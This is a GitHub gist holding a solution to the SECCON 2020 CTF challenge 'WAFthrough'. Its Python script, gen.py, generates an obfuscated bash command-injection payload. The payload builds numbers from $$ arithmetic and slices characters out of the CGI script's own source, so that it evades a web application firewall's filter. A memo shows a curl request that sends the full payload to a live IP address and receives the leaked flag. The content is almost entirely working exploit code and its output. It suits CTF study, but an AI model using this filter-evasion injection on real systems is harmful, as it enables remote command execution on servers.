Skip to content

Instantly share code, notes, and snippets.

@st98

st98/gen.py

Last active April 8, 2021 11:55
Show Gist options
  • Save st98/3d2dec8545122ac4c45505070b9f7fd7 to your computer and use it in GitHub Desktop.
Save st98/3d2dec8545122ac4c45505070b9f7fd7 to your computer and use it in GitHub Desktop.
Download ZIP
SECCON 2020 Online CTF - WAFthrough
Raw
gen.py
with open('index.cgi', 'rb') as f:
s = f.read()
table = {
0: ['$$-$$', '__'],
1: ['$$/$$', '___'],
2: ['$___+$___', '____'],
4: ['$____*$____', '_____'],
8: ['$_____*$____', '______'],
16: ['$______*$____', '_______'],
32: ['$_______*$____', '________'],
}
pre = ''
for k in [0, 1, 2, 4, 8, 16, 32]:
v = table[k]
pre += f'{v[1]}=$(({v[0]}));'
pre = pre[:-1]
def num_to_v(x):
res = ''
for i in range(7):
if x & (1 << i):
res += '+$' + table[1 << i][1]
return res[1:]
def char_to_v(c):
template = '${_________:((I)):(($___))}'
i = s.index(c)
res = template.replace('I', num_to_v(i))
return res
def f(s):
template = '_[$(PRE;_________=$(<${!__});GO)]'
go = ''
for c in s:
go += char_to_v(bytes([c]))
return template.replace('PRE', pre).replace('GO', go)
res = f(b'fa')
print(len(res), res)
Raw
memo.txt
$ curl -g 'http://153.120.168.36/cgi-bin/index.cgi?q=_[$(__=$(($$-$$));___=$(($$/$$));____=$(($___+$___));_____=$(($____*$____));______=$(($_____*$____));_______=$(($______*$____));________=$(($_______*$____));_________=$(<${!__});__________=$(../../???/${_________:(($____+$______+$_______)):(($___))}?${_________:(($______)):(($___))}?);v${__________:$___})]'
...
<div class="container-fluid">
<div class="row">
<div class="ml-3">
<h2>
/usr/lib/cgi-bin/index.cgi: line 52: 2015ECCON{WAF0000000000!}: command not found
</h2>
</div>
</div>
</div>
...
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment